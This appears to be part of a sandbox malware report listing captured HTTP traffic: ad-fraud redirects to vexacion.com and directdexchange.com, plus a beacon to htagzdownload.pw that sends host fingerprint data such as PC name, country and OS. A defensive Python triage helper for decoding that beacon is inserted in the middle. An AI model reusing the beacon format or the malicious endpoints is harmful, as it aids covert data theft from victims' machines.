Source: global traffic HTTP traffic detected: GET /afu.php?id=1294231 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /afu.php?zoneid=1492888&var=3 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /afu.php?zoneid=1851483 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /afu.php?zoneid=1343177&var=3 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5
Source: global traffic HTTP traffic detected: GET /afu.php?zoneid=1851513 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic HTTP traffic detected: GET /afu.php?id=1339680 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic HTTP traffic detected: GET /afu.php?zoneid=1620783&var=3 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic HTTP traffic detected: GET /jump/next.php?r=2087215 HTTP/1.1Host: www.directdexchange.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /afu.php?id=1343178 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic HTTP traffic detected: GET /jump/next.php?stamat=m%257C%252CwI2Z7Y2LqB1dwP0dEdHP3xP.19a%252C2t5FkDDYpjxJXsMWHSh7wKsTFo_9DWdVnHcBDLzDvAWvvhwYRZDYe0ZsowfF7dmW&cbur=0.8941180851075679&cbtitle=&cbiframe=0&cbWidth=1034&cbHeight=876&cbdescription=&cbkeywords=&cbref= HTTP/1.1Host: www.directdexchange.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /script/i.php?stamat=m%257C%252C%252Cg3PWYhE6oGU3BU9GH0dEdHP3xP.496%252CJ9Q8Q_UIgs9Kxcxyx-U4wQshKBKNG7-rYnaHixyxr6OH3VPRfwqQ_GzwHdPFlPRwWa5YU7zZdRMNDmj_4g5-h2wdkbz4dMJC0Fnhbe1neELDcqALiMA96kJC8cdtqOp1si_2RBYwy2ChjFCPi-ttcaIhRwhqQGPSaPYGkeLfZI13I_KMwt-_2ZpPRlduEaKwwVxJ3hmqpkoFZz7WR-XN4cWIYSoehHUTeiSRufDIuK6-ZcZlgq93EWKTszRNcRAnpS9DuIfFTDCOBbvQY9cXObu86hWi-C-HKoLKExk7eXxe_dxN-nGiZai-IBxKthk8inK9EddpeuzlMuf3EAqbFpqEEBcRT3UYmR6ypfVFabU3r55Ct7X_1lz8GPCzsfPdgAEWXXMLmEZvtRcz1E3Fa4rSLYHFiZml5KHWP_4RSIx925l41NlYou6QyD0qghav2U80t5X0TUB6ZYI74CNCvXDBqX9c-5JmRQvLGV5Wrx0%252C HTTP/1.1Host: www.directdexchange.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /afu.php?zoneid=1851483 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic HTTP traffic detected: GET /afu.php?zoneid=1851513 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic HTTP traffic detected: GET /jump/next.php?r=2087215 HTTP/1.1Host: www.directdexchange.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /jump/next.php?stamat=m%257C%252CwI2Z7Y2LqB1dwP0dEdHP3xP.19a%252C2t5FkDDYpjxJXsMWHSh7wKsTFo_9DWdVnHcBDLzDvAWvvhwYRZDYe0ZsowfF7dmW&cbur=0.5357586367230445&cbtitle=&cbiframe=0&cbWidth=1034&cbHeight=876&cbdescription=&cbkeywords=&cbref= HTTP/1.1Host: www.directdexchange.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /script/i.php?stamat=m%257C%252C%252CwjKWoiZvoGU3BZ9GH0dEdHP3xP.5ac%252CtTPBIp8UNBXK7MDXTgz64xvdZ0u6aZ3TKc34Zz5N2qtMsjqES0bSmllnITSGq1EOZoFnXFIi5xUaKU_px33-bQHJxnCGSWtRYRqEtz7p8oiZRMbxQGIolIwDtRV81wyO7u1ngrI9yCLrOUwcVjQeU4bDvxEpjpAIJjxDAAp2Ai1U90zsNxFTwb--LTg5OmpzwmkiDjCR3Vn2v35SMu3wmzDrJK_5ZeoIu-DBXVXzL4EM6p0xsGzfd_8ZZ5OngKlcIHryXXS8j4LJksyOgtXhpmXPb5535EIKDaV7WHlTJseja-qaSXjg1BLvjBli8yi6bPvorf8Tvy6DeIKEJkZ5Ze2NsFbCSDGzpmSD9KQZiF-4U9mw3xw6uEIuPsgt2FDLDw88324J5R6EIcTmgvuFNFFlUxCik4xdpvFTWGjJY7p1-bB8XXb2--la7wZtf_EpvlhuQyO5CQ1YZieBfaLlmQ%252C%252C HTTP/1.1Host: www.directdexchange.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /afu.php?id=1294231 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic HTTP traffic detected: GET /afu.php?zoneid=1492888&var=3 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic HTTP traffic detected: GET /afu.php?zoneid=1343177&var=3 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic HTTP traffic detected: GET /afu.php?id=1339680 HTTP/1.1
    Host: vexacion.com
    Connection: keep-alive
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic HTTP traffic detected: GET /afu.php?zoneid=1620783&var=3 HTTP/1.1
    Host: vexacion.com
    Connection: keep-alive
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic HTTP traffic detected: GET /afu.php?id=1343178 HTTP/1.1
    Host: vexacion.com
    Connection: keep-alive
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic HTTP traffic detected: GET /afu.php?zoneid=1851483 HTTP/1.1
    Host: vexacion.com
    Connection: keep-alive
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic HTTP traffic detected: GET /afu.php?zoneid=1851513 HTTP/1.1
    Host: vexacion.com
    Connection: keep-alive
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic HTTP traffic detected: GET /?clickid=Uts05EylDxyIUKiWAaW7RzRhUkG3H5wBgxwYxU0&cm_mmc=aff-_-ir-_-1310690-_-77416&ref=imprad1310690&afn_sr=impact HTTP/1.1
    Host: www.abebooks.com
    Connection: keep-alive
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /jump/next.php?r=2087215 HTTP/1.1
    Host: www.directdexchange.com
    Connection: keep-alive
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /jump/next.php?stamat=m%257C%252CwI2Z7Y2LqB1dwP0dEdHP3xP.19a%252C2t5FkDDYpjxJXsMWHSh7wKsTFo_9DWdVnHcBDLzDvAWvvhwYRZDYe0ZsowfF7dmW&cbur=0.12477552690685689&cbtitle=&cbiframe=0&cbWidth=1034&cbHeight=876&cbdescription=&cbkeywords=&cbref= HTTP/1.1
    Host: www.directdexchange.com
    Connection: keep-alive
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /script/i.php?stamat=m%257C%252C%252Cg3Z3d2a7oGU3Bv-GH0dEdHP3xP.3d3%252C9glu00p7OCSVcw7tiBE7G_X6_vJMkAgrSaSc9qMgw16cBpDefRb5oQr9kiBFuuP8BPUH2mxOZrKj410lIWL160ZP9QgZcmYNBDj_adXeShFhVxtDDWcTGwhgkxgg1sQhXHFj5yjJL1nelmJ2RT-FY_PnDru5fDFDdR2kKRzRlA-ZVtjNy5f0TSwW24hfufp5VneromdrOTcCro4yOTDzPHn7WkKIBFOrtF3sKYAN-q6jepgfBB95TkcTBeiw6-hM5laJ4OtyZLpUwc3Nq8WDYM9OIXAbrPVAAkByIDSNhqiowfd3yCAh81q--BD8eIPDPlmT9-ZinfIe0sXGj5CtQIxKkTu2YDq6iW1jzR-fuIclU5GZuVq4bE7aIwCd4z4fzaKKyb_qvMw-G4bLCpaHO_4Im2c0EDGuWRYpvrr4-bK3hshvclafesccSEKuKm-3Jka-xpS7fjGp-nrNDyGnOA-fAmPbvXQ1fOQVzVY41blaLs1bUIDzvaKPhR4HvGXg HTTP/1.1
    Host: www.directdexchange.com
    Connection: keep-alive
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /afu.php?id=1294231 HTTP/1.1
    Host: vexacion.com
    Connection: keep-alive
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic HTTP traffic detected: GET /afu.php?zoneid=1492888&var=3 HTTP/1.1
    Host: vexacion.com
    Connection: keep-alive
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic HTTP traffic detected: GET /afu.php?zoneid=1343177&var=3 HTTP/1.1
    Host: vexacion.com
    Connection: keep-alive
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic HTTP traffic detected: GET / HTTP/1.1
    Host: www.google.com
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /afu.php?id=1339680 HTTP/1.1
    Host: vexacion.com
    Connection: keep-alive
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic HTTP traffic detected: GET /SaveData/SaveData.php?ezzabour=%7B%22NameOffer%22:%22Acrons%22,%22ip%22:%22%22,%22country%22:%22CH%22,%22DateTime%22:%222022/01/14%2018:01%22,%22Device%22:%22835180%22,%22PCName%22:%22user%22,%22postcheck%22:%22False%22,%22tag%22:%22kenpachi2_lyla7_lylach7_irecord_goodchannel_registry_goodchannel_AdxpertMedia_Acrons%22,%22Os%22:%22WIN10%22,%22Browser%22:%22Chrome%22%7D HTTP/1.1
    Host: htagzdownload.pw
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /afu.php?zoneid=1620783&var=3 HTTP/1.1
    Host: vexacion.com
    Connection: keep-alive
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
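Triage helper for the HTTP requests listed above. This is an added example, not part of the Joe Sandbox report and not code from the sample or the sandbox. Two things in the list matter to an analyst: the requests to www.google.com and htagzdownload.pw carry no User-Agent header at all (the behaviour the report's "HTTP GET or POST without a user agent" signature keys on, and a cheap way to separate the sample's own connectivity check and beacon from the browser-like ad traffic to vexacion.com and www.directdexchange.com), and the SaveData.php request carries a URL-encoded JSON blob in the `ezzabour` parameter with host-fingerprint fields (country, PCName, Os, Browser, tag). The code parses raw request records, flags the missing User-Agent, and decodes that blob. The three request records are reconstructed from the report entries with their header lines restored to CRLF form; the function and field names (`parse_request`, `triage`, `no_user_agent`) are this example's own.

```python
"""Parse captured HTTP requests, flag missing User-Agent, decode the ezzabour beacon.
Added example; the sample input below is reconstructed from the report, not captured here."""
import json
from dataclasses import dataclass
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Constructed input: three requests from the report with headers restored to one per line.
UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36")
BEACON_QUERY = (
    "ezzabour=%7B%22NameOffer%22:%22Acrons%22,%22ip%22:%22%22,%22country%22:%22CH%22,"
    "%22DateTime%22:%222022/01/14%2018:01%22,%22Device%22:%22835180%22,%22PCName%22:%22user%22,"
    "%22postcheck%22:%22False%22,%22tag%22:%22kenpachi2_lyla7_lylach7_irecord_goodchannel_"
    "registry_goodchannel_AdxpertMedia_Acrons%22,%22Os%22:%22WIN10%22,%22Browser%22:%22Chrome%22%7D"
)
SAMPLE_REQUESTS = [
    "GET /afu.php?zoneid=1620783&var=3 HTTP/1.1\r\n"
    "Host: vexacion.com\r\nConnection: keep-alive\r\n"
    f"User-Agent: {UA}\r\n"
    "Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: www.google.com\r\nConnection: Keep-Alive\r\n\r\n",
    f"GET /SaveData/SaveData.php?{BEACON_QUERY} HTTP/1.1\r\n"
    "Host: htagzdownload.pw\r\nConnection: Keep-Alive\r\n\r\n",
]


@dataclass
class Request:
    method: str
    path: str
    query: Dict[str, List[str]]   # decoded query parameters, one list per name
    headers: Dict[str, str]       # header names lower-cased for lookup


def parse_request(raw: str) -> Request:
    """Split a raw HTTP/1.1 request head into method, path, query and headers."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    parts = urlsplit(target)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if not line:
            continue
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    # keep_blank_values so parameters such as cbtitle= in the report are preserved
    return Request(method, parts.path, parse_qs(parts.query, keep_blank_values=True), headers)


def missing_user_agent(req: Request) -> bool:
    """True when the request sends no User-Agent header at all (not merely an odd one)."""
    return "user-agent" not in req.headers


def decode_beacon(req: Request, param: str = "ezzabour") -> Optional[dict]:
    """Return the JSON object the sample URL-encodes into the given query parameter, if any."""
    values = req.query.get(param)
    if not values:
        return None
    try:
        payload = json.loads(values[0])
    except json.JSONDecodeError:
        return None
    return payload if isinstance(payload, dict) else None


def triage(raw_requests: List[str]) -> List[dict]:
    """One finding per request: host, path, missing-UA flag and decoded beacon (or None)."""
    findings = []
    for raw in raw_requests:
        req = parse_request(raw)
        findings.append({
            "host": req.headers.get("host", ""),
            "path": req.path,
            "no_user_agent": missing_user_agent(req),
            "beacon": decode_beacon(req),
        })
    return findings


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_REQUESTS), indent=2))
```

Run stand-alone it prints one finding per request; the vexacion.com entry decodes to no beacon and has a User-Agent, while the google.com and htagzdownload.pw entries are flagged for the missing header and the latter yields the decoded fingerprint object. The same `triage` call works on any list of raw request heads pulled from a PCAP, which is where it becomes useful beyond the three records reconstructed here.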
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50733
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50734
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50738
Source: unknown Network traffic detected: HTTP traffic on port 50726 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50730
Source: unknown Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50693 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50211 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50177 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
